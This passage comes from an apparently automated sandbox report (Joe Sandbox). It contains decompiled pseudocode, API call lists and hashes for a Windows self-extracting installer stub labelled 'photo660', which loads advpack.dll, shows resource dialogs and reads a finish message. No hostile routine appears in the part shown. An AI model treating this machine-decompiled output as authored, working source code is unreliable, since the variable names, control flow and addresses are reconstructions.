                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E002144B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E00216CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00213969
                                                                                                                                                                                                        0x00213915
                                                                                                                                                                                                        0x00213915
                                                                                                                                                                                                        0x0021391b
                                                                                                                                                                                                        0x0021391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021392d
                                                                                                                                                                                                        0x00213933
                                                                                                                                                                                                        0x00213938
                                                                                                                                                                                                        0x0021393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213940
                                                                                                                                                                                                        0x00213946
                                                                                                                                                                                                        0x0021394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002138f2
                                                                                                                                                                                                        0x00213843
                                                                                                                                                                                                        0x00213845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021384b
                                                                                                                                                                                                        0x0021384d
                                                                                                                                                                                                        0x00213883
                                                                                                                                                                                                        0x00213885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021389a
                                                                                                                                                                                                        0x0021389e
                                                                                                                                                                                                        0x0021389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002138a0
                                                                                                                                                                                                        0x002138a0
                                                                                                                                                                                                        0x002138a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002138a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002138a4
                                                                                                                                                                                                        0x0021384f
                                                                                                                                                                                                        0x00213851
                                                                                                                                                                                                        0x00213857
                                                                                                                                                                                                        0x0021386e
                                                                                                                                                                                                        0x00213877
                                                                                                                                                                                                        0x0021387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213881
                                                                                                                                                                                                        0x00213859
                                                                                                                                                                                                        0x0021385c
                                                                                                                                                                                                        0x00213862
                                                                                                                                                                                                        0x00213866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002138f4
                                                                                                                                                                                                        0x002138f4
                                                                                                                                                                                                        0x002138f5
                                                                                                                                                                                                        0x002138fb
                                                                                                                                                                                                        0x00213901
                                                                                                                                                                                                        0x00213901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021390a
                                                                                                                                                                                                        0x0021374b
                                                                                                                                                                                                        0x0021374e
                                                                                                                                                                                                        0x0021375c
                                                                                                                                                                                                        0x00213764
                                                                                                                                                                                                        0x00213769
                                                                                                                                                                                                        0x0021376e
                                                                                                                                                                                                        0x00213771
                                                                                                                                                                                                        0x0021379c
                                                                                                                                                                                                        0x0021379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002137a3
                                                                                                                                                                                                        0x002137a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002137a4
                                                                                                                                                                                                        0x00213773
                                                                                                                                                                                                        0x00213777
                                                                                                                                                                                                        0x00213778
                                                                                                                                                                                                        0x0021377f
                                                                                                                                                                                                        0x00213781
                                                                                                                                                                                                        0x0021378e
                                                                                                                                                                                                        0x0021378e
                                                                                                                                                                                                        0x00213794
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213794
                                                                                                                                                                                                        0x00213783
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213785
                                                                                                                                                                                                        0x0021378c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021378c
                                                                                                                                                                                                        0x00213750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021372d
                                                                                                                                                                                                        0x0021372d
                                                                                                                                                                                                        0x0021396b
                                                                                                                                                                                                        0x0021396b
                                                                                                                                                                                                        0x0021396c
                                                                                                                                                                                                        0x0021396e
                                                                                                                                                                                                        0x0021396f
                                                                                                                                                                                                        0x00213a1e
                                                                                                                                                                                                        0x00213a1e
                                                                                                                                                                                                        0x00213a22
                                                                                                                                                                                                        0x00213a27
                                                                                                                                                                                                        0x00213a3e
                                                                                                                                                                                                        0x00213a3e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00213723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 002139C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,photo660,00000030), ref: 002139F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$photo660
                                                                                                                                                                                                        • API String ID: 2519184315-2999727582
                                                                                                                                                                                                        • Opcode ID: 3bef77c42b2c63d93afaf4171a029a4d1e3ec645d9fd117c90e50e0d14d10f61
                                                                                                                                                                                                        • Instruction ID: 559e5506f978ad3c29df776ccda3435dc38dbe5ab4f6f4fe920fd1ea97d25758
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bef77c42b2c63d93afaf4171a029a4d1e3ec645d9fd117c90e50e0d14d10f61
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F91F3B1A212259BEB34CF14CD857EAB7E6AF65304F1540A9D8899B281DB708FE1CF41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                                        			E00216517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0x219a3c; // 0x210000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E002144B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t5 =  &_a16; // 0x212ee8
                                                                                                                                                                                                        					_t24 =  *_t5;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00210000,000007D6,00000005), ref: 0021652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(00210000,00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00216538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(00210000,00000000,00000547,002119E0,00000000), ref: 00216557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00216560
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID: .!
                                                                                                                                                                                                        • API String ID: 1214682469-2740948462
                                                                                                                                                                                                        • Opcode ID: c7d3b15c49e068938cd7de0230100f3696485c819826b053cc0c218e5cc24f9e
                                                                                                                                                                                                        • Instruction ID: 0bb5fa20f31ec1011a9e5bad4ffcbdcca149acf41463510ec154f9006f1ca7fe
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7d3b15c49e068938cd7de0230100f3696485c819826b053cc0c218e5cc24f9e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44012672101206BBCB205F69AC0CEFF7AADEBA9360F404125FE04A3150DB718D608AE1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E00216495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E00211781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E0021658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 002164DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 002164F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00216502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-3761280616
                                                                                                                                                                                                        • Opcode ID: 15504ab6814ef464350187977bf915969d3833a87e8bbb9dae7a48b9a9d6c625
                                                                                                                                                                                                        • Instruction ID: be6c7659d1e77646b28610312692de229b4f45b79e272f45138a56c71c9d27df
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15504ab6814ef464350187977bf915969d3833a87e8bbb9dae7a48b9a9d6c625
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5801D630520108BBDB10DBA4EC4DBEE77B9DB74311F900195F589921C0DFB09EE6CA51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E00214169(void* __eflags) {
                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E0021468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E0021468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E002144B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E002144B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,002130B4), ref: 00214189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,002130B4), ref: 002141E7
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: deeab2d133b3b1cea51f5e6576daf0b9aac6f715d108b26990b731cd888d61b3
                                                                                                                                                                                                        • Instruction ID: 0afa40885a1855612bc0faf615a84c25d6e4d1893068f51ec5a2c5b3f3e55d56
                                                                                                                                                                                                        • Opcode Fuzzy Hash: deeab2d133b3b1cea51f5e6576daf0b9aac6f715d108b26990b731cd888d61b3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F01FDB53202253BE3243A255C9AFFB21CEDBB5794F104025B70EE1180CEA8CCA10475
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00217155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0x218004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0x218004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0x218008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00217182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00217191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0021719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 002171A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 002171B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: 59b5d977472628662ed4fe18f110f2d1a554ffc241dfba3528bd3d43c7f81d0d
                                                                                                                                                                                                        • Instruction ID: 9a8926967549de9d84095ea17cb5705ab22eca23ca78a11a31cceaf4e8a53323
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59b5d977472628662ed4fe18f110f2d1a554ffc241dfba3528bd3d43c7f81d0d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B111C71D15208EFCB10DFF8EA8CADEB7F5EF68315F618855D809E7210EA309A548B41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E002119E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E002143D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0x219a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00211A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00211A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00211A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00211A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 00211A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: 5fa466bdd37c2aa34c406248e2842f9dabb44539e66f15bb6daefacff7f63f00
                                                                                                                                                                                                        • Instruction ID: ae436c3489f40c6cfb493ed692211cefc68f3b91a2b198e584f1265f93bdfe94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5fa466bdd37c2aa34c406248e2842f9dabb44539e66f15bb6daefacff7f63f00
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1811E13152110AAFCB00EF64ED0CAEE7BF8EF29300F208150FA1692190CE319EA0CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E002163C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				long _v272;
                                                                                                                                                                                                        				void* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                        				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_v276 = _a16;
                                                                                                                                                                                                        				_t37 = 1;
